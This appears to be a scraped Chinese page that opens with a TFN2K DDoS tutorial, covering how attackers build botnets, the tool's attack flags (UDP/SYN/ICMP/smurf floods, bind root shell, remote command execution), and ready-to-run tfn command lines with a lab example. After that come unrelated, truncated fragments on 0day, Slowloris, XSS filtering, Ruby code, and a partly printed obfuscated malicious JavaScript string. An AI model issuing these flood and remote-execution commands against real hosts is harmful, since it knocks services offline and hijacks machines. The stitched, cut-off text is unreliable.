
攻击者发起DDOS攻击的第一步,就是寻找在Internet上有漏洞的主机,进入系统后在其上面安装后门程序,攻击者入侵的主机越多,他的攻击队伍就越壮大。第二步在入侵主机上安装攻击程序,其中一部分主机充当攻击的主控端,一部分主机充当攻击的代理端。最后各部分主机各司其职,在攻击者的调遣下对攻击对象发起攻击。由于攻击者在幕后操作,所以在攻击时不会受到监控系统的跟踪,身份不容易被发现。
TFN2K是由德国著名黑客Mixter编写的分布式拒绝服务攻击工具,是同类攻击工具TFN的后续版本。
TFN2K通过主控端利用大量代理端主机的资源进行对一个或多个目标的协同攻击。当前互联网中的UNIX,Solaris和WindowsNT等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其他系统平台上。
TFN2K由两部分组成:在主控端主机上的客户端和代理端主机上的守护进程。主控端向其他代理端发起攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。有一个主控端控制的多个代理端主机,能够在攻击过程中相互协同,保证攻击的连续性。主控端和代理端的网络通讯是经过加密的,还可能混杂了许多虚假数据包。整个TFN2K网络可能使用不同的TCP,UDP或ICMP包进行通讯,而且主控端还能伪造其IP地址。所有这些特征都使发展防御TFN2K攻击的策略和技术都非常困难或效率低下。
TFN2K常用攻击命令:
| -f | 这个参数后面跟文本文件名,就是真正实现DDOS攻击 |
|---|---|
| -h | DOS攻击也就是单机,一对一的攻击,后面跟一个主机或IP地址 |
| -p | 后面指定一个端口 |
| -c | 最关键的参数,一共由11个选项: |
| 0 | 停止攻击 |
| 1 | 反欺骗等级设定,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自己给的,所以不用担心会反查到你的IP地址 |
| 2 | 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包,可以通过改变每个包的有效载荷的字节增加它的大小 |
| 3 | 绑定rootshell:启动一个会话服务,然后连接一个指定端口就可以得到一个rootshell |
| 4 | UDP洪水攻击:这个攻击是利用这样一个事实:每个UDP包被送往一个关闭的端口,这样就会有一个ICMP不可达到的信息返回,增加了攻击的能力 |
| 5 | SYN洪水攻击:这个攻击由规律的送虚假的链接请求。结果会是目标端口拒绝服务,添满TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击 |
| 6 | ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包 |
| 7 | SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复 |
| 8 | MIX攻击:按照1:1:1的关系交替的发送UDP,SYN,ICMP包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮播轰炸 |
| 9 | TARGA3攻击 |
| 10 | 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制 |
./tfn -f hostext -c 10 -i "mkdir /root/edison"在所有的HOST上root目录建立edison,-i后面跟“命令”
./tfn -f hostext -c 4 -i x.x.x.x 使用hostext文件中记录的主机对x.x.x.x服务器进行UDP攻击
./tfn -f hostext -c 5 -i x.x.x.x -p xxxx 使用hostext文件中记录的主机对x.x.x.x服务器进行TCP拒绝服务攻击
./tfn -f hostext -c 6 -i x.x.x.x 使用hostext文件中记录的主机对x.x.x.x服务器进行ICMP攻击




IP:192.168.70.137
./td

touch ip.txtecho “192.168.70.137”>ip.txt
./tfn -f ip.txt -c 10 -i "mkdir /tmp/test"


./tfn -f ip.txt -c 5 -i 192.168.70.139


./tfn -f ip.txt -c 0
什么是0day漏洞?0day漏洞,是指已经被发现,但是还未被公开,同时官方还没有相关补丁的漏洞;通俗的讲,就是除了黑客,没人知道他的存在,其往往具有很大的突发性、破坏性、致命性。0day漏洞之所以称为0day,正是因为其补丁永远晚于攻击。所以攻击者利用0day漏洞攻击的成功率极高,往往可以达到目的并全身而退,而防守方却一无所知,只有在漏洞公布之后,才后知后觉,却为时已晚。“后知后觉、反应迟钝”就是当前安全防护面对0day攻击的真实写照!为了方便大家理解,中科三方为大家梳理当前安全防护模式下,一个漏洞从发现到解决的三个时间节点:T0:此时漏洞即0day漏洞,是已经被发现,还未被公开,官方还没有相
前言 Slowloris攻击是我在李华峰老师的书——《MetasploitWeb 渗透测试实战》里面看的,感觉既简单又使用,现在这种攻击是很容易被防护的啦。不过我也不敢真刀实战的去试,只是拿个靶机玩玩罢了。 废话还是写在结语里面吧。(划掉)结语可以不看(划掉)Slowloris攻击的原理 Slowloris是一种资源消耗类DoS攻击,它利用部分HTTP请求进行操作。也叫做慢速攻击,这里的慢速并不是说发动攻击慢,而是访问一条链接的速度慢。Slowloris攻击的功能是打开与目标Web服务器的连接,然后尽可能长时间的保持这些连接打开。如果由多台电脑同时发起Slo
我正在使用https://github.com/kickstarter/rack-attack/#throttles限制对某些网址的请求。机架攻击文档展示了如何通过请求IP或请求参数进行限制,但我想做的是限制每个用户的请求。因此,无论IP是什么,用户都应该能够在特定时间范围内发出不超过n个请求。我们使用devise进行身份验证,我想不出一种简单的方法来根据请求唯一标识用户。我应该在session/cookie中存储用户ID吗?也许是一个uniq哈希?您对实现这一目标的最佳方式有何看法? 最佳答案 想通了。Devise已将用户ID存储
我正在尝试为像这样的ActiveRecord模型提供一组非常通用的命名范围:moduleScopesdefself.included(base)base.class_evaldonamed_scope:not_older_than,lambda{|interval|{:conditions=>["#{table_name}.created_at>=?",interval.ago]}endendendActiveRecord::Base.send(:include,Scopes)classUser如果命名范围应该是通用的,我们需要指定*table_name*以防止命名问题,如果它们是来自
继Heartbleed错误之后,thispostonruby-lang.org描述了如何检查漏洞和升级。它包括这个建议:要验证您链接到Ruby的OpenSSL库版本,请使用以下命令:ruby-v-ropenssl-rfiddle-e'putsFiddle::Function.new(Fiddle.dlopen(nil)["SSLeay_version"],[Fiddle::TYPE_INT],Fiddle::TYPE_VOIDP).call(0)'要验证当前随Ruby安装的OpenSSL版本,请使用以下命令:ruby-ropenssl-e'putsOpenSSL::OPENSSL_VE
我正在开发一个网络应用程序,用户可以在其中回复博客条目。这是一个安全问题,因为它们可以发送将呈现给其他用户(并由javascript执行)的危险数据。他们无法格式化他们发送的文本。没有“粗体”,没有颜色,什么都没有。只是简单的文字。我想出了这个正则表达式来解决我的问题:[^\\w\\s.?!()]因此,任何不是单词字符(a-Z、A-Z、0-9)、不是空格、“.”、“?”、“!”、“(”或“)”的内容都将被替换为空字符字符串。每个引号都将替换为:“"”。我在前端检查数据,在我的服务器上检查。有人可以绕过这个“解决方案”吗?我想知道StackOverflow是如何做这件事的?这里有
我正在对我的网站进行javascript和xss攻击的xss防护。它是用ASP.NETWebforms编写的。我想测试的主要部分是一个带有文本框(附有tinyMCE)的用户控件。用户可以通过在此文本框中书写来向站点提交故事。我必须将validateRequest设置为false,因为我想获取HMTL(tinyMCE)中的用户故事。我应该如何防止javascript-xss攻击?由于用户的故事是HMTL文本,我不能在他们的故事上使用Server.HtmlEncode。一般来说,从用户那里接收HTML内容、保存然后将其显示给用户的安全方法是什么?如果一个用户在文本框中放入恶意代码并提交,这
我有一段讨厌的javascript,我想去混淆。我知道我可以启动一个VM并看到恶意软件的所有荣耀,但我更感兴趣的是不让它运行,而是以非混淆的形式查看它。如果它需要运行才能执行此操作,那么就这样吧,我想。有人知道如何在不损害自己的情况下做到这一点吗?谢谢,蒂姆编辑:这是代码(一个衬里,它在脚本标签之间)。这是发给我的,我无权访问服务器。var$a="Z6fpZ3dZ22Z2524aZ253dZ2522dw(dcsZ2528cuZ252c14Z2529);Z2522;Z22;ceZ3dZ22arZ2543oZ2564eZ2541Z2574Z25280Z2529^Z2528Z2527Z253
是否有方法可以防止或使某人难以注入(inject)Javascript并操纵变量或访问函数?我有一个想法是在每次重新加载时随机更改所有var名称,以便每次都需要重写恶意软件脚本?或者还有其他不那么痛苦的方法吗?我知道最终有人会闯入,但我想知道如何使重现操作变得困难,这样人们就不会发布小书签或类似的东西供所有人使用。我不在乎专家是否在代码中找到了他们的方法,但我希望它比javascript:d=0;复杂一点如果您知道如何让破解Javascript变得更加困难,请写下来。 最佳答案 接受您的javascript将被“操纵”并在服务器端进
目前我开发了一个用于处理金融交易的网站。我看到我的一些客户进行了JavaScript注入(inject)攻击,并进行了一些不可能的交易。例如,我在他下订单之前检查了他的现金余额。但他们中的一些人确实通过在地址栏中运行以下javascript来改变这一点。他们通过查看页面源代码获取了变量名。javascript:void(document.accounts.cashBalence.value="10000000")因为这很关键,所以我想快速修复它。那么有没有办法防止JavaScript注入(inject)攻击呢? 最佳答案 您可以混淆